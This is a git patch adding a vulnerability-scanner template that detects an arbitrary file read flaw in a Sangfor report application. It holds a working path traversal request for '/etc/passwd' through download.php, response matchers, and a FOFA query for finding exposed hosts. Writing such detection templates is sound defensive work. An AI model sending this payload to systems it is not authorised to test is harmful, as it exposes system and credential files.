From 587197f9b5d3379f5a30079d7e6620c08ad5fde6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 5 Aug 2023 11:39:16 +0530 Subject: [PATCH] Create sangfor-download-lfi.yaml --- .../other/sangfor-download-lfi.yaml | 38 +++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 http/vulnerabilities/other/sangfor-download-lfi.yaml diff --git a/http/vulnerabilities/other/sangfor-download-lfi.yaml b/http/vulnerabilities/other/sangfor-download-lfi.yaml new file mode 100644 index 0000000000..cd7109ea4a --- /dev/null +++ b/http/vulnerabilities/other/sangfor-download-lfi.yaml @@ -0,0 +1,38 @@ +id: sangfor-download-lfi + +info: + name: Sangfor Application download.php - Arbitary File Read + author: DhiyaneshDk + severity: high + description: | + There is an arbitrary file reading vulnerability in the Sangfor Application download.php. + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E5%BA%94%E7%94%A8%E4%BA%A4%E4%BB%98%E6%8A%A5%E8%A1%A8%E7%B3%BB%E7%BB%9F%20download.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md?plain=1 + metadata: + max-request: 1 + fofa-query: app="SANGFOR-应用交付报表系统" + verified: true + tags: lfi,sangfor + +http: + - method: GET + path: + - '{{BaseURL}}/report/download.php?pdf=../../../../../etc/passwd' + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'root:.*:0:0:' + + - type: word + part: header + words: + - application/force-download + - 'filename="passwd"' + condition: and + + - type: status + status: + - 200